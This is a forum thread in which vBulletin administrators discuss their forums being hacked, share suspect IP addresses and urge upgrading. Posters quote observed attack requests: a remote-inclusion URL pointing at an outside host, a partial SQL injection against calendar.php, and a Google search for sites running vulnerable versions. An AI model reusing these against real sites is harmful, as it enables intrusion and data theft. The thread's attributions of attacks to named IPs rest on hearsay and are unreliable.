Hacked :-(

I got hacked a few months ago. Not nice

Can you see how he's achieved it via apache access logs?

I'd like to get a hold of yours for the past 12 hours prior to the hacking to see how he got in as there isn't a way that we know of that can simply give yourself admin permission.

..I've PM'ed you a log file

today I've been getting a few weird requests like : showthread.php?t=http://www.b00gle.com/s/2&page=http://www.b00gle.com/s/2

I've banned the IP that owns it : 213.239.194.75

OMG.... Noooo Way! That is the same first 9 digits of the IP address of the guy who hacked my forum. He deleted like 1,000,000 posts and guess what (backups didn't work!)

I have contact the webhost that this IP resolves to and they informed me that this was the second report of hacking from that IP and provided me with contact information (including phone number) for the customer who owns that IP! Please e-mail me at [email protected]

We are filing a report with the FBI on the matter.

He called himself [email protected] when he hacked me.... and his message also included arabic text.

He got us as well over at murc. i've managed to recover the database, killed the forum titles, but the posts and threads were still there.

running 2.2.9, i'll forward the logs if you want as soon as they are available

to recover the forums, you need to do a little bit of hard work in phpmyadmin.

So your telling me that the posts might still have been there?

I upgraded to Vb 3 after the "incident" having figured that all was lost. So.... those posts might still be around? Cause if they are I would be willing to pay to have them recovered. I know little to nothing about php and mysql really. I'd be willing to pay you to help me out if you think it can be recovered ($100).

Come to think of it... I bet those posts are still there because the backup files are still over 400 mb.

Basically someone has went and looked through google for older versions of vBulletin and is picking on those who have neglected to upgrade.

Do offer a service that would check to see if I still have all the old posts and them restore them?

It was late last night here in the US when I got your warning message about the hacking trend. I was in two minds whether to go to bed or do the update. I figured what's the likelihood that they'll get my forum (I was running vB 2.2.9). Surely not! But, curiosity got the better of me and I decided to do the upgrade to 2.3.5 there and then (I had been putting off upgrading for several months and almost let my vB lease expire). Today, coincidentally at the very moment I was maintaining our forum web server I witnessed someone trying to mess with my forums by issuing the following command:
myforumaddress/forums/calendar.php?action=edit&%20eventid=14%20union%20select%20userid,username,emai...


This is apparently a SQL injection attack (according to BlackICE which picked up the intrusion attempt).



IP address used was 82.129.217.130

A WhoIs traces back to a small subnet in Sohag, Egypt with a contact with a Hotmail address.

The referral to the forum web server came from a Google search. Presumably our forums are somewhere in Google as running with an older vB version.

Here is a chunk of the Google search expression that was used:
http://www.google.com/search?q=powered+by:+vbulletin+version+2.2.9&hl=en&lr=&ie=UTF-8&start=100&sa=N

This search yields 121,000 results. We are way, way down the list on page 10. Many of the entries in the list, including the one before us, show that they've already been hacked!

Here is what a hacked vB site looks like: http://boozet.xepher.net/vbulletin/

Presumably that is the hack attack type that you've been referring to, yes?
It seems to have been unsuccessful. So, it looks like I narrowly averted being hacked! Thanks for the warning!

So, fair warning to anyone that is putting off doing the upgrade, or that thinks it won't happen to them, do the upgrade and do it right now!

My website was also hacked. It is still saying that I have something like 62,999 posts in my database though. They are not showing up on my home page. Is there anyway to restore access to these posts?

You'd need to check if the forum and thread tables are still in tact else you'll have to restore them from a backup.

Monday I banned 212.100.251.149 from our server (since I read this post) and was surprised to find a hit every day since. Then I searched through past logs. I ended up unbanning the IP because I saw nothing but normal activity.

This is the second IP I've found where others have reported seeing exploit attempts in the web logs and I see nothing but normal activity? Any ideas? I don't know what the odds of a spoofed IP are, but I'd think it would be rather small.